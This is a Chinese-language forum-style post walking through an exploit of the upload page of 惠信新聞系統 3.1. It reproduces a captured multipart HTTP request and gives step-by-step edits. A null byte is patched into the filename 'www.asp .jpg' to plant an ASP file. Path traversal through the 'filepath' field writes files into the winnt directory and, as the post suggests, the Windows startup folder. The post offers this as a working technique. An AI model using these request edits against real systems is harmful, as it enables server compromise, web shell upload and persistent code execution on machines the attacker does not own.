近來大家為dvbbs的文件上傳漏洞興奮不已，想想在其他的系統(tǒng)里面能不能用的上呢？我就以惠信新聞系統(tǒng)來拋磚引玉吧！ 
惠信新聞系統(tǒng)3.1 windows2000+sp4 
先看這句代碼。admin_uploadfilesave.asp 
............... 
Server.mappath(formPath&file.FileName) 
............................ 
保存時用路徑+文件名+后綴名，那我們可以用dvbbs上的漏洞了，只不過我們改的是文件名（因為系統(tǒng)有固定的路徑 ，改路徑的話，上傳不會成功） 
這是我捕獲的數(shù)據(jù)： 
POST /admin_uploadfilesave.asp HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
Referer: http://127.0.0.1/admin_uploadfile.asp 
Accept-Language: zh-cn 
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 
Host: 127.0.0.1 
Content-Length: 658 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL 

-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="act" 

upload 
-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="upcount" 

1 
-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="filepath" 

newstxt/ 
-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg" 
Content-Type: text/plain 

<% language=vbscript %> 
<ihihoiojpojppokkhhkhkhkhk 
hkhjkjkjjlkkkkkk> 

-----------------------------7d42cb1f101ae 
Content-Disposition: form-data; name="Submit" 

提交 
-----------------------------7d42cb1f101ae-- 
我將其中filename 處改為www.asp+（空格）.jpg，同dvbbs利用一樣改content_length的長度，然后用編輯器修改空格十六進制20為00，上傳成功！呵呵！ 

再看路徑我們不能改，那能不能利用../../這樣的方式回切呢？試試就知道了,捕獲數(shù)據(jù)同上，將name="filepath" 
newstxt/ 改為： newstxt/../../../winnt 
content-length:658 改為：（658+14）672 
好，開始上傳，哈哈！在winnt下發(fā)現(xiàn)www.asp文件。那我們就可以將路徑改為windows的自啟動目錄，上傳exe,vbs,bat...文件。不過以上都要在獲得新聞系統(tǒng)的管理者之后，進一步進入。  

最新評論